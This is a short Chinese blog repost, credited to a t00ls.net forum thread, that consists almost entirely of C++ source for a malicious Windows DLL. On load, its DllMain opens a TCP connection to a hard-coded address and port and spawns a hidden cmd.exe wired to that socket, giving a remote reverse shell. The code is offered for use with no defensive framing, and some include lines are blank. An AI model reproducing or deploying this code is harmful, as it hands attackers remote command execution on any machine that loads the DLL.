A-A+

dll 反弹代码

2017年04月19日 13:15 汪洋大海 暂无评论 阅读 18 views 次

作者:lostwolf
地址:https://www.t00ls.net/thread-39410-1-1.html


// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "stdafx.h"
#include
#include

#pragma comment(lib,"ws2_32")
void reverse_shell();
WSADATA wsaData;
SOCKET Winsock;
SOCKET Sock;
struct sockaddr_in hax;

STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;

BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{

switch (dwReason)
{
case DLL_PROCESS_ATTACH:
reverse_shell();
break;

case DLL_PROCESS_DETACH:

break;

case DLL_THREAD_ATTACH:

break;

case DLL_THREAD_DETACH:

break;
}
return TRUE;
}

void reverse_shell()
{
LPCSTR szMyUniqueNamedEvent = "sysnullevt";
HANDLE m_hEvent = CreateEventA(NULL, TRUE, FALSE, szMyUniqueNamedEvent);

switch (GetLastError())
{
// app is already running
case ERROR_ALREADY_EXISTS:
{
CloseHandle(m_hEvent);
break;
}

case ERROR_SUCCESS:
{

break;
}
}

WSAStartup(MAKEWORD(2, 2), &wsaData);
Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);

hax.sin_family = AF_INET;
hax.sin_port = htons(atoi("1116"));

hax.sin_addr.s_addr = inet_addr("172.31.139.141");
WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);

memset(&ini_processo, 0, sizeof(ini_processo));
ini_processo.cb = sizeof(ini_processo);
ini_processo.dwFlags = STARTF_USESTDHANDLES;
ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;

CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, (LPSTARTUPINFOA)&ini_processo, &processo_info);

}

标签:

给我留言